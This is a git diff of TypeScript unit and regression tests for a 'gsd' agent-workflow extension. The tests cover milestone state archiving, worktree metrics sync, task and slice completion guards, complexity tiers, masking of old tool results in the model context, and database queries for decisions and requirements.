diff --git a/src/resources/extensions/gsd/tests/completed-units-metrics-sync.test.ts b/src/resources/extensions/gsd/tests/completed-units-metrics-sync.test.ts
new file mode 100644
index 000000000..46da65fa6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/completed-units-metrics-sync.test.ts
@@ -0,0 +1,111 @@
+/**
+ * completed-units-metrics-sync.test.ts — Regression tests for #2313.
+ *
+ * 1. completed-units.json should be archived (not wiped) on milestone transition
+ * 2. metrics.json should be in the worktree → project root sync file list
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, mkdtempSync, mkdirSync, writeFileSync, existsSync, cpSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+// ─── Bug 1: completed-units.json should be archived, not wiped ─────────────
+
+const phasesSrcPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const phasesSrc = readFileSync(phasesSrcPath, "utf-8");
+
+test("#2313: completed-units.json should not be blindly wiped to [] on milestone transition", () => {
+  // The milestone transition block should NOT write an empty array to completed-units.json
+  // without first archiving the existing data. Look for the archive/rename pattern.
+  const transitionIdx = phasesSrc.indexOf("Milestone transition");
+  assert.ok(transitionIdx !== -1, "Milestone transition section exists");
+
+  // Find the completed-units handling block
+  const completedUnitsIdx = phasesSrc.indexOf("completed-units", transitionIdx);
+  assert.ok(completedUnitsIdx !== -1, "completed-units handling exists in transition");
+
+  // Get a window around the completed-units handling (1200 chars to
+  // accommodate CRLF line endings on Windows which inflate byte offsets).
+  const windowStart = Math.max(0, completedUnitsIdx - 300);
+  const windowEnd = Math.min(phasesSrc.length, completedUnitsIdx + 900);
+  const window = phasesSrc.slice(windowStart, windowEnd).toLowerCase();
+
+  // Should archive/rename the old file before resetting
+  const hasArchive = window.includes("archive") ||
+    window.includes("rename") ||
+    window.includes("cpsync") ||
+    window.includes("safecopy") ||
+    window.includes("completed-units-");
+
+  assert.ok(
+    hasArchive,
+    "completed-units.json should be archived before reset during milestone transition",
+  );
+});
+
+// ─── Bug 2: metrics.json should be in the sync file lists ──────────────────
+
+test("#2313: syncStateToProjectRoot should sync metrics.json", () => {
+  const syncSrcPath = join(import.meta.dirname, "..", "auto-worktree.ts");
+  const syncSrc = readFileSync(syncSrcPath, "utf-8");
+
+  // syncStateToProjectRoot should copy metrics.json from worktree to project root
+  assert.ok(
+    syncSrc.includes("metrics.json"),
+    "auto-worktree.ts should reference metrics.json for sync",
+  );
+});
+
+test("#2313: syncWorktreeStateBack should include metrics.json in ROOT_STATE_FILES", () => {
+  const autoWorktreeSrcPath = join(import.meta.dirname, "..", "auto-worktree.ts");
+  const autoWorktreeSrc = readFileSync(autoWorktreeSrcPath, "utf-8");
+
+  // Find the ROOT_STATE_FILES constant (single source of truth for both sync directions)
+  const constIdx = autoWorktreeSrc.indexOf("ROOT_STATE_FILES");
+  assert.ok(constIdx !== -1, "ROOT_STATE_FILES constant exists");
+
+  // Get the array content
+  const arrayStart = autoWorktreeSrc.indexOf("[", constIdx);
+  const arrayEnd = autoWorktreeSrc.indexOf("]", arrayStart);
+  const rootFilesBlock = autoWorktreeSrc.slice(arrayStart, arrayEnd);
+
+  assert.ok(
+    rootFilesBlock.includes("metrics.json"),
+    "metrics.json should be in ROOT_STATE_FILES list",
+  );
+});
+
+// ─── Functional test: completed-units archive ────────────────────────────────
+
+test("#2313: functional — completed-units archive creates milestone-specific file", () => {
+  const tmpBase = mkdtempSync(join(tmpdir(), "gsd-completed-units-"));
+  const gsdDir = join(tmpBase, ".gsd");
+  mkdirSync(gsdDir, { recursive: true });
+
+  // Simulate existing completed-units.json with data
+  const existing = [
+    { type: "task", id: "T01" },
+    { type: "slice", id: "S01" },
+  ];
+  const completedKeysPath = join(gsdDir, "completed-units.json");
+  writeFileSync(completedKeysPath, JSON.stringify(existing, null, 2));
+
+  // Simulate the archive behavior: copy to milestone-specific file
+  const milestoneId = "M001";
+  const archivePath = join(gsdDir, `completed-units-${milestoneId}.json`);
+  cpSync(completedKeysPath, archivePath);
+
+  // Reset the main file
+  writeFileSync(completedKeysPath, JSON.stringify([], null, 2));
+
+  // Verify archive exists with original data
+  assert.ok(existsSync(archivePath), "archive file should exist");
+  const archived = JSON.parse(readFileSync(archivePath, "utf-8"));
+  assert.deepEqual(archived, existing, "archived data should match original");
+
+  // Verify main file is reset
+  const current = JSON.parse(readFileSync(completedKeysPath, "utf-8"));
+  assert.deepEqual(current, [], "current completed-units should be empty after transition");
+});
diff --git a/src/resources/extensions/gsd/tests/completion-hierarchy-guards.test.ts b/src/resources/extensions/gsd/tests/completion-hierarchy-guards.test.ts
new file mode 100644
index 000000000..030f948c2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/completion-hierarchy-guards.test.ts
@@ -0,0 +1,192 @@
+// GSD State Machine Regression Tests — Completion Hierarchy & State Derivation (#3161)
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+  getSlice,
+  getMilestone,
+  getSliceTasks,
+  updateTaskStatus,
+  updateSliceStatus,
+} from "../gsd-db.ts";
+import { isClosedStatus } from "../status-guards.ts";
+
+// ─── Setup / Teardown ──────────────────────────────────────────────────────
+
+beforeEach(() => {
+  openDatabase(":memory:");
+});
+
+afterEach(() => {
+  try { closeDatabase(); } catch { /* swallow */ }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("completion-hierarchy-guards", () => {
+
+  // ─── Test 1: isClosedStatus ─────────────────────────────────────────────
+  test("isClosedStatus returns true for 'complete' and 'done'", () => {
+    assert.ok(isClosedStatus("complete"), "'complete' should be closed");
+    assert.ok(isClosedStatus("done"), "'done' should be closed");
+    assert.ok(!isClosedStatus("pending"), "'pending' should not be closed");
+    assert.ok(!isClosedStatus("in-progress"), "'in-progress' should not be closed");
+    assert.ok(!isClosedStatus("blocked"), "'blocked' should not be closed");
+    assert.ok(!isClosedStatus(""), "empty string should not be closed");
+    assert.ok(!isClosedStatus("active"), "'active' should not be closed");
+  });
+
+  // ─── Test 2: vacuous truth guard — slice with zero tasks ───────────────
+  test("cannot complete slice with zero tasks — vacuous truth guard", () => {
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const tasks = getSliceTasks("M001", "S01");
+    assert.equal(tasks.length, 0, "newly inserted slice has zero tasks");
+
+    // The guard: a slice with no tasks is not completable.
+    // isSliceComplete from state.ts: plan.tasks.length > 0 && every done.
+    // Here we replicate the DB-side equivalent: zero tasks means guard fires.
+    const isCompletable = tasks.length > 0 && tasks.every(t => isClosedStatus(t.status));
+    assert.equal(isCompletable, false, "vacuous truth guard: zero tasks → not completable");
+  });
+
+  // ─── Test 3: cannot complete slice with incomplete tasks ─────────────────
+  test("cannot complete slice with incomplete tasks", () => {
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "done" });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    const tasks = getSliceTasks("M001", "S01");
+    assert.equal(tasks.length, 2, "slice has 2 tasks");
+
+    const incompleteTasks = tasks.filter(t => !isClosedStatus(t.status));
+    assert.equal(incompleteTasks.length, 1, "exactly one task is not closed");
+    assert.equal(incompleteTasks[0]?.id, "T02", "the incomplete task is T02");
+    assert.equal(incompleteTasks[0]?.status, "pending", "incomplete task status is 'pending'");
+  });
+
+  // ─── Test 4: phantom parent milestone and slice (H6) ────────────────────
+  test("task completion auto-creates phantom parent milestone and slice (H6)", () => {
+    // H6 finding: insertMilestone/insertSlice accept empty titles — phantom
+    // parents can be created without substantive content.
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const milestone = getMilestone("M001");
+    assert.ok(milestone !== null, "phantom milestone M001 should exist in DB");
+    assert.equal(milestone!.title, "", "phantom milestone has empty title by default");
+
+    const slice = getSlice("M001", "S01");
+    assert.ok(slice !== null, "phantom slice S01 should exist in DB");
+    assert.equal(slice!.title, "", "phantom slice has empty title by default");
+
+    // This documents the H6 finding: the DB allows phantom parents with
+    // no meaningful content, which can silently accept task completion calls.
+  });
+
+  // ─── Test 5: double task completion is detectable via isClosedStatus ────
+  test("double task completion is detectable via isClosedStatus", () => {
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "done" });
+
+    const task = getTask("M001", "S01", "T01");
+    assert.ok(task !== null, "task T01 should exist");
+    assert.ok(
+      isClosedStatus(task!.status),
+      "isClosedStatus detects already-closed task — prevents double completion",
+    );
+
+    // The guard that prevents double completion: check isClosedStatus before
+    // calling updateTaskStatus again.
+    const wouldDoubleComplete = isClosedStatus(task!.status);
+    assert.ok(wouldDoubleComplete, "guard fires: task is already closed");
+  });
+
+  // ─── Test 6: updateSliceStatus rollback loses original status (M11) ─────
+  test("updateSliceStatus rollback goes to 'pending' not original status (M11)", () => {
+    insertMilestone({ id: "M001" });
+    // Insert with an explicit non-pending status to simulate an in-progress slice
+    insertSlice({ id: "S01", milestoneId: "M001", status: "pending" });
+
+    // Manually advance to "in_progress" equivalent via updateSliceStatus
+    updateSliceStatus("M001", "S01", "in_progress");
+    const afterProgress = getSlice("M001", "S01");
+    assert.equal(afterProgress!.status, "in_progress", "slice is in_progress after update");
+
+    // Simulate completion
+    updateSliceStatus("M001", "S01", "complete", new Date().toISOString());
+    const afterComplete = getSlice("M001", "S01");
+    assert.equal(afterComplete!.status, "complete", "slice is complete after completion");
+
+    // Simulate rollback — the DB only stores current status, not history.
+    // Rolling back means setting to "pending" — the original "in_progress" is lost.
+    updateSliceStatus("M001", "S01", "pending");
+    const afterRollback = getSlice("M001", "S01");
+    assert.equal(
+      afterRollback!.status,
+      "pending",
+      "M11: rollback sets status to 'pending', original 'in_progress' is lost",
+    );
+    // Document: there is no completed_at or status history to recover from.
+    // The rollback silently discards the in_progress state.
+  });
+
+  // ─── Test 7: milestone completion requires all slices closed ─────────────
+  test("milestone completion requires all slices closed", () => {
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001", status: "done" });
+    insertSlice({ id: "S02", milestoneId: "M001", status: "pending" });
+
+    const s01 = getSlice("M001", "S01");
+    const s02 = getSlice("M001", "S02");
+
+    assert.ok(s01 !== null, "S01 exists");
+    assert.ok(s02 !== null, "S02 exists");
+
+    const slices = [s01!, s02!];
+    const incompleteSlices = slices.filter(s => !isClosedStatus(s.status));
+    assert.ok(
+      incompleteSlices.length > 0,
+      "milestone is not completable — has incomplete slices",
+    );
+    assert.equal(incompleteSlices[0]?.id, "S02", "S02 is the incomplete slice");
+    assert.equal(incompleteSlices[0]?.status, "pending", "S02 status is 'pending'");
+  });
+
+  // ─── Test 8: closed parent blocks child completion ───────────────────────
+  test("closed parent blocks child completion", () => {
+    // Insert a milestone already in 'complete' state
+    insertMilestone({ id: "M001", status: "complete" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const milestone = getMilestone("M001");
+    assert.ok(milestone !== null, "milestone M001 exists");
+    assert.ok(
+      isClosedStatus(milestone!.status),
+      "parent milestone is closed — isClosedStatus returns true",
+    );
+
+    // The guard in complete-slice checks parent status via isClosedStatus.
+    // If isClosedStatus(milestone.status) === true, the child cannot be completed.
+    const parentIsClosed = isClosedStatus(milestone!.status);
+    assert.ok(parentIsClosed, "closed parent guard fires: milestone.status is 'complete'");
+
+    // Verify the slice itself is not yet closed
+    const slice = getSlice("M001", "S01");
+    assert.ok(slice !== null, "slice S01 exists");
+    assert.ok(!isClosedStatus(slice!.status), "slice S01 is not yet closed (parent is already closed)");
+  });
+
+});
diff --git a/src/resources/extensions/gsd/tests/complexity-classifier.test.ts b/src/resources/extensions/gsd/tests/complexity-classifier.test.ts
index 4c6a39c08..46b39ff4d 100644
--- a/src/resources/extensions/gsd/tests/complexity-classifier.test.ts
+++ b/src/resources/extensions/gsd/tests/complexity-classifier.test.ts
@@ -1,7 +1,7 @@
-import test from "node:test";
+import test, { describe } from "node:test";
 import assert from "node:assert/strict";
 
-import { classifyUnitComplexity, tierLabel, tierOrdinal } from "../complexity-classifier.js";
+import { classifyUnitComplexity, tierLabel, tierOrdinal, extractTaskMetadata } from "../complexity-classifier.js";
 import type { ComplexityTier, TaskMetadata } from "../complexity-classifier.js";
 
 // ─── tierLabel ───────────────────────────────────────────────────────────────
@@ -41,14 +41,14 @@ test("research-slice classifies as standard", () => {
   assert.equal(result.tier, "standard");
 });
 
-test("plan-milestone classifies as standard", () => {
+test("plan-milestone classifies as heavy", () => {
   const result = classifyUnitComplexity("plan-milestone", "M001", "/tmp/fake");
-  assert.equal(result.tier, "standard");
+  assert.equal(result.tier, "heavy");
 });
 
-test("plan-slice classifies as standard", () => {
+test("plan-slice classifies as heavy", () => {
   const result = classifyUnitComplexity("plan-slice", "M001/S01", "/tmp/fake");
-  assert.equal(result.tier, "standard");
+  assert.equal(result.tier, "heavy");
 });
 
 test("replan-slice classifies as heavy", () => {
@@ -179,3 +179,28 @@ test("execute-task with few code blocks stays standard", () => {
   const result = classifyUnitComplexity("execute-task", "M001/S01/T01", "/tmp/fake", undefined, metadata);
   assert.equal(result.tier, "standard");
 });
+
+// ─── ClassificationResult taskMetadata passthrough ───────────────────────────
+
+describe("ClassificationResult taskMetadata", () => {
+  test("classifyUnitComplexity for execute-task returns result with taskMetadata populated", () => {
+    const metadata: TaskMetadata = { fileCount: 3, tags: ["docs"] };
+    const result = classifyUnitComplexity("execute-task", "M001/S01/T01", "/tmp/fake", undefined, metadata);
+    assert.ok(result.taskMetadata !== undefined, "taskMetadata should be populated for execute-task");
+    assert.equal(result.taskMetadata!.tags?.[0], "docs");
+  });
+
+  test("classifyUnitComplexity for hook/xyz returns result with taskMetadata undefined", () => {
+    const result = classifyUnitComplexity("hook/verify", "M001/S01/T01", "/tmp/fake");
+    assert.equal(result.taskMetadata, undefined, "taskMetadata should be undefined for hook units");
+  });
+
+  test("classifyUnitComplexity for plan-slice returns result with taskMetadata undefined", () => {
+    const result = classifyUnitComplexity("plan-slice", "M001/S01", "/tmp/fake");
+    assert.equal(result.taskMetadata, undefined, "taskMetadata should be undefined for plan-slice");
+  });
+
+  test("extractTaskMetadata is importable as a named export and is a function", () => {
+    assert.equal(typeof extractTaskMetadata, "function", "extractTaskMetadata should be a callable function");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/context-masker.test.ts b/src/resources/extensions/gsd/tests/context-masker.test.ts
new file mode 100644
index 000000000..e09f11c14
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/context-masker.test.ts
@@ -0,0 +1,122 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+
+import { createObservationMask } from "../context-masker.js";
+
+// These helpers produce messages in the pi-ai LLM payload format
+// (post-convertToLlm, pre-provider), which is what before_provider_request sees.
+
+function userMsg(content: string) {
+  return { role: "user", content: [{ type: "text", text: content }] };
+}
+
+function assistantMsg(content: string) {
+  return { role: "assistant", content: [{ type: "text", text: content }] };
+}
+
+/** toolResult in pi-ai format: role "toolResult", content as TextContent[] */
+function toolResult(text: string) {
+  return { role: "toolResult", content: [{ type: "text", text }], toolCallId: "toolu_test", toolName: "Read", isError: false };
+}
+
+/** bashExecution after convertToLlm: becomes a user message with "Ran `cmd`" prefix */
+function bashResult(text: string) {
+  return { role: "user", content: [{ type: "text", text: `Ran \`echo test\`\n\`\`\`\n${text}\n\`\`\`` }] };
+}
+
+const MASK_TEXT = "[result masked — within summarized history]";
+
+test("masks nothing when message count is within keepRecentTurns", () => {
+  const mask = createObservationMask(8);
+  const messages = [
+    userMsg("hello"),
+    assistantMsg("hi"),
+    toolResult("file contents"),
+  ];
+  const result = mask(messages as any);
+  assert.equal(result.length, 3);
+  assert.deepEqual((result[2].content as any)[0].text, "file contents");
+});
+
+test("masks tool results older than keepRecentTurns", () => {
+  const mask = createObservationMask(2);
+  const messages = [
+    userMsg("turn 1"),
+    toolResult("old tool output"),
+    assistantMsg("response 1"),
+    userMsg("turn 2"),
+    toolResult("newer tool output"),
+    assistantMsg("response 2"),
+    userMsg("turn 3"),
+    toolResult("newest tool output"),
+    assistantMsg("response 3"),
+  ];
+  const result = mask(messages as any);
+  // Old tool result (before boundary) should be masked
+  assert.equal((result[1].content as any)[0].text, MASK_TEXT);
+  // Recent tool results (within keep window) should be preserved
+  assert.equal((result[4].content as any)[0].text, "newer tool output");
+  assert.equal((result[7].content as any)[0].text, "newest tool output");
+});
+
+test("never masks assistant messages", () => {
+  const mask = createObservationMask(1);
+  const messages = [
+    userMsg("turn 1"),
+    assistantMsg("old reasoning"),
+    userMsg("turn 2"),
+    assistantMsg("new reasoning"),
+  ];
+  const result = mask(messages as any);
+  assert.equal((result[1].content as any)[0].text, "old reasoning");
+  assert.equal((result[3].content as any)[0].text, "new reasoning");
+});
+
+test("never masks user messages", () => {
+  const mask = createObservationMask(1);
+  const messages = [
+    userMsg("old user message"),
+    assistantMsg("response"),
+    userMsg("new user message"),
+    assistantMsg("response"),
+  ];
+  const result = mask(messages as any);
+  assert.equal((result[0].content as any)[0].text, "old user message");
+});
+
+test("masks bash result user messages", () => {
+  const mask = createObservationMask(1);
+  const messages = [
+    userMsg("turn 1"),
+    bashResult("huge log output"),
+    assistantMsg("response 1"),
+    userMsg("turn 2"),
+    assistantMsg("response 2"),
+  ];
+  const result = mask(messages as any);
+  assert.equal((result[1].content as any)[0].text, MASK_TEXT);
+});
+
+test("returns same array length", () => {
+  const mask = createObservationMask(1);
+  const messages = [
+    userMsg("a"), toolResult("b"), assistantMsg("c"),
+    userMsg("d"), toolResult("e"), assistantMsg("f"),
+  ];
+  const result = mask(messages as any);
+  assert.equal(result.length, messages.length);
+});
+
+test("masks toolResult by role, not by type field", () => {
+  const mask = createObservationMask(1);
+  const messages = [
+    userMsg("turn 1"),
+    // This is the actual pi-ai format: role "toolResult", no type field
+    { role: "toolResult", content: [{ type: "text", text: "old result" }], toolCallId: "t1", toolName: "Read", isError: false },
+    assistantMsg("response 1"),
+    userMsg("turn 2"),
+    assistantMsg("response 2"),
+  ];
+  const result = mask(messages as any);
+  assert.equal((result[1].content as any)[0].text, MASK_TEXT);
+});
diff --git a/src/resources/extensions/gsd/tests/context-store.test.ts b/src/resources/extensions/gsd/tests/context-store.test.ts
index a3f256d91..f81934092 100644
--- a/src/resources/extensions/gsd/tests/context-store.test.ts
+++ b/src/resources/extensions/gsd/tests/context-store.test.ts
@@ -1,4 +1,5 @@
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
 import {
   openDatabase,
   closeDatabase,
@@ -14,454 +15,616 @@ import {
   formatRequirementsForPrompt,
   queryArtifact,
   queryProject,
+  formatRoadmapExcerpt,
+  queryKnowledge,
 } from '../context-store.ts';
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: fallback when DB not open
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: fallback returns empty when DB not open ===');
-{
-  closeDatabase();
-  assertTrue(!isDbAvailable(), 'DB should not be available');
+describe("context-store: fallback when DB not open", () => {
+  test("returns empty when DB not open", () => {
+    closeDatabase();
+    assert.ok(!isDbAvailable(), 'DB should not be available');
 
-  const d = queryDecisions();
-  assertEq(d, [], 'queryDecisions returns [] when DB closed');
+    const d = queryDecisions();
+    assert.deepStrictEqual(d, [], 'queryDecisions returns [] when DB closed');
 
-  const r = queryRequirements();
-  assertEq(r, [], 'queryRequirements returns [] when DB closed');
+    const r = queryRequirements();
+    assert.deepStrictEqual(r, [], 'queryRequirements returns [] when DB closed');
 
-  const df = queryDecisions({ milestoneId: 'M001' });
-  assertEq(df, [], 'queryDecisions with opts returns [] when DB closed');
+    const df = queryDecisions({ milestoneId: 'M001' });
+    assert.deepStrictEqual(df, [], 'queryDecisions with opts returns [] when DB closed');
 
-  const rf = queryRequirements({ sliceId: 'S01' });
-  assertEq(rf, [], 'queryRequirements with opts returns [] when DB closed');
-}
+    const rf = queryRequirements({ sliceId: 'S01' });
+    assert.deepStrictEqual(rf, [], 'queryRequirements with opts returns [] when DB closed');
+  });
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: query decisions
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: query all active decisions ===');
-{
-  openDatabase(':memory:');
+describe("context-store: query decisions", () => {
+  afterEach(() => closeDatabase());
 
-  insertDecision({
-    id: 'D001', when_context: 'M001/S01', scope: 'architecture',
-    decision: 'use SQLite', choice: 'node:sqlite', rationale: 'built-in',
-    revisable: 'yes', made_by: 'agent', superseded_by: 'D003', // superseded!
-  });
-  insertDecision({
-    id: 'D002', when_context: 'M001/S01', scope: 'architecture',
-    decision: 'use WAL mode', choice: 'WAL', rationale: 'concurrent reads',
-    revisable: 'no', made_by: 'agent', superseded_by: null,
-  });
-  insertDecision({
-    id: 'D003', when_context: 'M002/S01', scope: 'performance',
-    decision: 'use better-sqlite3', choice: 'better-sqlite3', rationale: 'faster',
-    revisable: 'yes', made_by: 'agent', superseded_by: null,
+  test("query all active decisions", () => {
+    openDatabase(':memory:');
+
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'use SQLite', choice: 'node:sqlite', rationale: 'built-in',
+      revisable: 'yes', made_by: 'agent', superseded_by: 'D003', // superseded!
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'use WAL mode', choice: 'WAL', rationale: 'concurrent reads',
+      revisable: 'no', made_by: 'agent', superseded_by: null,
+    });
+    insertDecision({
+      id: 'D003', when_context: 'M002/S01', scope: 'performance',
+      decision: 'use better-sqlite3', choice: 'better-sqlite3', rationale: 'faster',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    const all = queryDecisions();
+    assert.strictEqual(all.length, 2, 'query all active decisions returns 2 (superseded excluded)');
+    const ids = all.map(d => d.id);
+    assert.ok(ids.includes('D002'), 'D002 should be in active results');
+    assert.ok(ids.includes('D003'), 'D003 should be in active results');
+    assert.ok(!ids.includes('D001'), 'D001 (superseded) should NOT be in active results');
   });
 
-  const all = queryDecisions();
-  assertEq(all.length, 2, 'query all active decisions returns 2 (superseded excluded)');
-  const ids = all.map(d => d.id);
-  assertTrue(ids.includes('D002'), 'D002 should be in active results');
-  assertTrue(ids.includes('D003'), 'D003 should be in active results');
-  assertTrue(!ids.includes('D001'), 'D001 (superseded) should NOT be in active results');
+  test("query decisions by milestone", () => {
+    openDatabase(':memory:');
 
-  closeDatabase();
-}
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'decision A', choice: 'A', rationale: 'r', revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: null,
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M002/S02', scope: 'architecture',
+      decision: 'decision B', choice: 'B', rationale: 'r', revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: null,
+    });
 
-console.log('\n=== context-store: query decisions by milestone ===');
-{
-  openDatabase(':memory:');
+    const m1 = queryDecisions({ milestoneId: 'M001' });
+    assert.strictEqual(m1.length, 1, 'milestone filter M001 returns 1');
+    assert.strictEqual(m1[0]?.id, 'D001', 'milestone filter returns D001');
 
-  insertDecision({
-    id: 'D001', when_context: 'M001/S01', scope: 'architecture',
-    decision: 'decision A', choice: 'A', rationale: 'r', revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: null,
-  });
-  insertDecision({
-    id: 'D002', when_context: 'M002/S02', scope: 'architecture',
-    decision: 'decision B', choice: 'B', rationale: 'r', revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: null,
+    const m2 = queryDecisions({ milestoneId: 'M002' });
+    assert.strictEqual(m2.length, 1, 'milestone filter M002 returns 1');
+    assert.strictEqual(m2[0]?.id, 'D002', 'milestone filter returns D002');
   });
 
-  const m1 = queryDecisions({ milestoneId: 'M001' });
-  assertEq(m1.length, 1, 'milestone filter M001 returns 1');
-  assertEq(m1[0]?.id, 'D001', 'milestone filter returns D001');
+  test("query decisions by scope", () => {
+    openDatabase(':memory:');
 
-  const m2 = queryDecisions({ milestoneId: 'M002' });
-  assertEq(m2.length, 1, 'milestone filter M002 returns 1');
-  assertEq(m2[0]?.id, 'D002', 'milestone filter returns D002');
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'decision A', choice: 'A', rationale: 'r', revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: null,
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M001/S01', scope: 'performance',
+      decision: 'decision B', choice: 'B', rationale: 'r', revisable: 'yes',
+      made_by: 'agent',
+      superseded_by: null,
+    });
 
-  closeDatabase();
-}
+    const arch = queryDecisions({ scope: 'architecture' });
+    assert.strictEqual(arch.length, 1, 'scope filter architecture returns 1');
+    assert.strictEqual(arch[0]?.id, 'D001', 'scope filter returns D001');
 
-console.log('\n=== context-store: query decisions by scope ===');
-{
-  openDatabase(':memory:');
+    const perf = queryDecisions({ scope: 'performance' });
+    assert.strictEqual(perf.length, 1, 'scope filter performance returns 1');
+    assert.strictEqual(perf[0]?.id, 'D002', 'scope filter returns D002');
 
-  insertDecision({
-    id: 'D001', when_context: 'M001/S01', scope: 'architecture',
-    decision: 'decision A', choice: 'A', rationale: 'r', revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: null,
+    const none = queryDecisions({ scope: 'nonexistent' });
+    assert.strictEqual(none.length, 0, 'scope filter nonexistent returns 0');
   });
-  insertDecision({
-    id: 'D002', when_context: 'M001/S01', scope: 'performance',
-    decision: 'decision B', choice: 'B', rationale: 'r', revisable: 'yes',
-    made_by: 'agent',
-    superseded_by: null,
-  });
-
-  const arch = queryDecisions({ scope: 'architecture' });
-  assertEq(arch.length, 1, 'scope filter architecture returns 1');
-  assertEq(arch[0]?.id, 'D001', 'scope filter returns D001');
-
-  const perf = queryDecisions({ scope: 'performance' });
-  assertEq(perf.length, 1, 'scope filter performance returns 1');
-  assertEq(perf[0]?.id, 'D002', 'scope filter returns D002');
-
-  const none = queryDecisions({ scope: 'nonexistent' });
-  assertEq(none.length, 0, 'scope filter nonexistent returns 0');
-
-  closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: query requirements
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: query all active requirements ===');
-{
-  openDatabase(':memory:');
+describe("context-store: query requirements", () => {
+  afterEach(() => closeDatabase());
 
-  insertRequirement({
-    id: 'R001', class: 'functional', status: 'active',
-    description: 'req A', why: 'w', source: 'M001', primary_owner: 'S01',
-    supporting_slices: 'S02', validation: 'v', notes: '', full_content: '',
-    superseded_by: 'R003', // superseded!
-  });
-  insertRequirement({
-    id: 'R002', class: 'non-functional', status: 'active',
-    description: 'req B', why: 'w', source: 'M001', primary_owner: 'S01',
-    supporting_slices: '', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
-  });
-  insertRequirement({
-    id: 'R003', class: 'functional', status: 'validated',
-    description: 'req C', why: 'w', source: 'M001', primary_owner: 'S02',
-    supporting_slices: 'S01', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
+  test("query all active requirements", () => {
+    openDatabase(':memory:');
+
+    insertRequirement({
+      id: 'R001', class: 'functional', status: 'active',
+      description: 'req A', why: 'w', source: 'M001', primary_owner: 'S01',
+      supporting_slices: 'S02', validation: 'v', notes: '', full_content: '',
+      superseded_by: 'R003', // superseded!
+    });
+    insertRequirement({
+      id: 'R002', class: 'non-functional', status: 'active',
+      description: 'req B', why: 'w', source: 'M001', primary_owner: 'S01',
+      supporting_slices: '', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
+    insertRequirement({
+      id: 'R003', class: 'functional', status: 'validated',
+      description: 'req C', why: 'w', source: 'M001', primary_owner: 'S02',
+      supporting_slices: 'S01', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
+
+    const all = queryRequirements();
+    assert.strictEqual(all.length, 2, 'query all active requirements returns 2 (superseded excluded)');
+    const ids = all.map(r => r.id);
+    assert.ok(ids.includes('R002'), 'R002 should be active');
+    assert.ok(ids.includes('R003'), 'R003 should be active');
+    assert.ok(!ids.includes('R001'), 'R001 (superseded) should NOT be active');
   });
 
-  const all = queryRequirements();
-  assertEq(all.length, 2, 'query all active requirements returns 2 (superseded excluded)');
-  const ids = all.map(r => r.id);
-  assertTrue(ids.includes('R002'), 'R002 should be active');
-  assertTrue(ids.includes('R003'), 'R003 should be active');
-  assertTrue(!ids.includes('R001'), 'R001 (superseded) should NOT be active');
+  test("query requirements by slice", () => {
+    openDatabase(':memory:');
 
-  closeDatabase();
-}
+    insertRequirement({
+      id: 'R001', class: 'functional', status: 'active',
+      description: 'req A', why: 'w', source: 'M001', primary_owner: 'S01',
+      supporting_slices: '', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
+    insertRequirement({
+      id: 'R002', class: 'functional', status: 'active',
+      description: 'req B', why: 'w', source: 'M001', primary_owner: 'S02',
+      supporting_slices: 'S01', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
+    insertRequirement({
+      id: 'R003', class: 'functional', status: 'active',
+      description: 'req C', why: 'w', source: 'M001', primary_owner: 'S03',
+      supporting_slices: '', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
 
